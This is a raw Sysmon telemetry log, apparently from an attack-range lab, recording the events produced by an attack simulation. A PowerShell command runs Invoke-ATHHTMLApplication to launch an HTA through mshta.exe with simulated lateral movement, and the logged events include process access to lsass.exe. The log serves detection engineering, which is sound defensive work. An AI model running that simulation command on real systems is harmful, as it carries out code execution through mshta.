@"C:\Users\Administrator\AppData\Local\Temp\ykro4hgn\ykro4hgn.cmdline"C:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{7901BC46-53E2-6008-A306-00000000A301}4128C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Invoke-ATHHTMLApplication -HTAFilePath Test.hta -ScriptEngine JScript -AsLocalUNCPath -SimulateLateralMovement -MSHTAFilePath $env:windir\system32\mshta.exe} 11241100x800000000000000029085Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.628{7901BC46-53E2-6008-A306-00000000A301}4128C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\ykro4hgn\ykro4hgn.cmdline2021-01-20 16:01:38.628 11241100x800000000000000029084Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.localDLL2021-01-20 16:01:38.628{7901BC46-53E2-6008-A306-00000000A301}4128C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\ykro4hgn\ykro4hgn.dll2021-01-20 16:01:38.628 10341000x800000000000000029083Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.471{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-53E2-6008-A306-00000000A301}4128C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029082Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.471{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-53E2-6008-A306-00000000A301}4128C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029081Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.424{7901BC46-4985-6008-0B00-00000000A301}856596C:\Windows\system32\lsass.exe{7901BC46-53E2-6008-A306-00000000A301}4128C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029080Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.424{7901BC46-4985-6008-0B00-00000000A301}856596C:\Windows\system32\lsass.exe{7901BC46-53E2-6008-A306-00000000A301}4128C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000029079Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.378{7901BC46-53E2-6008-A306-00000000A301}4128C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_hretu1nf.nyl.ps12021-01-20 16:01:38.378 10341000x800000000000000029078Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.378{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-53E2-6008-A306-00000000A301}4128C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029077Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.331{7901BC46-4FA9-6008-4405-00000000A301}70003220C:\Windows\system32\conhost.exe{7901BC46-53E2-6008-A306-00000000A301}4128C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029076Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.331{7901BC46-4FA9-6008-4305-00000000A301}74203768C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{7901BC46-53E2-6008-A306-00000000A301}4128C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF80592ED53) 10341000x800000000000000029075Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.331{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029074Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.331{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029073Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.331{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029072Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.331{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029071Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.331{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-53E2-6008-A306-00000000A301}4128C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029070Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.331{7901BC46-4FA9-6008-4305-00000000A301}74203768C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{7901BC46-53E2-6008-A306-00000000A301}4128C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\f170745c571d606b4c8c92644c7c13d7\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\f170745c571d606b4c8c92644c7c13d7\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\f170745c571d606b4c8c92644c7c13d7\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\f170745c571d606b4c8c92644c7c13d7\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49603743(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+496035b7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49685de3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+495fc19f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+4a0b5392(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+495c4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49622e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+496064cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+496064cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+496064cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+496064cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+496064cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+496064cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+4960635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+495f82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49631471(wow64) 154100x800000000000000029069Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.339{7901BC46-53E2-6008-A306-00000000A301}4128C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Invoke-ATHHTMLApplication -HTAFilePath Test.hta -ScriptEngine JScript -AsLocalUNCPath -SimulateLateralMovement -MSHTAFilePath $env:windir\system32\mshta.exe} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000029068Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.331{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-01-20 16:01:38.331 11241100x800000000000000029067Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.331{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-01-20 16:01:38.331 10341000x800000000000000029066Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.143{7901BC46-4FA9-6008-4405-00000000A301}70003220C:\Windows\system32\conhost.exe{7901BC46-53E2-6008-A206-00000000A301}6860C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029065Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.143{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029064Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.143{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029063Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.143{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029062Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.143{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029061Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.143{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-53E2-6008-A206-00000000A301}6860C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029060Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.143{7901BC46-4FA9-6008-4305-00000000A301}74203768C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{7901BC46-53E2-6008-A206-00000000A301}6860C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+4a1632a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49604130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49603e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+4a0b5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+495c4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49622e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+496064cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+496064cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+496064cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+4960635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+495f82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49604814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+496043b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49604130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49603e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+4a0b5466(wow64)|C:\W